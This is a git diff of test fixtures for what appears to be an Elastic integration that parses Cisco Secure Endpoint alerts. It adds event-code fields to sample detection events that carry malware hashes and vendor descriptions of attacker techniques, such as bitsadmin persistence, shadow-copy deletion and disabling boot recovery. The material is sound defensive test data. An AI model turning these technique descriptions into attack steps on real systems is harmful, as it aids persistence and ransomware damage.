+              {"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}
             ]
           }
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log
similarity index 100%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log
diff --git a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
similarity index 97%
rename from packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
rename to packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
index 97cb25c9fd3..18a94df069c 100644
--- a/packages/cisco_secure_endpoint/data_stream/log/_dev/test/pipeline/test-cisco-amp1.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
@@ -38,8 +38,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631357878Z",
+                "ingested": "2021-09-30T00:13:59.322410226Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411425813945647000",
@@ -103,11 +104,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:40:55.631362255Z",
+                "ingested": "2021-09-30T00:13:59.322416058Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6533243623469744000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6533243623469744000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -191,8 +193,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631364362Z",
+                "ingested": "2021-09-30T00:13:59.322418540Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533241347137077000",
@@ -268,8 +271,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631366339Z",
+                "ingested": "2021-09-30T00:13:59.322420859Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6533241347137077000",
@@ -339,8 +343,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631368328Z",
+                "ingested": "2021-09-30T00:13:59.322423196Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6533241145273614000",
@@ -439,8 +444,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631370243Z",
+                "ingested": "2021-09-30T00:13:59.322425452Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533241145273614000",
@@ -537,8 +543,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631372159Z",
+                "ingested": "2021-09-30T00:13:59.322427749Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533241145273614000",
@@ -614,8 +621,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631374059Z",
+                "ingested": "2021-09-30T00:13:59.322430017Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6533241145273614000",
@@ -692,8 +700,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631376023Z",
+                "ingested": "2021-09-30T00:13:59.322432281Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
                 "action": "Cloud IOC",
@@ -778,8 +787,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631377929Z",
+                "ingested": "2021-09-30T00:13:59.322434612Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
                 "action": "Cloud IOC",
@@ -864,8 +874,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631379877Z",
+                "ingested": "2021-09-30T00:13:59.322436881Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
                 "action": "Cloud IOC",
@@ -950,8 +961,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631381940Z",
+                "ingested": "2021-09-30T00:13:59.322439389Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:04:56.000Z",
                 "action": "Cloud IOC",
@@ -1036,8 +1048,9 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-27T00:40:55.631383894Z",
+                "ingested": "2021-09-30T00:13:59.322441669Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T10:04:49.000Z",
                 "action": "Cloud IOC",
@@ -1122,8 +1135,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631385847Z",
+                "ingested": "2021-09-30T00:13:59.322443929Z",
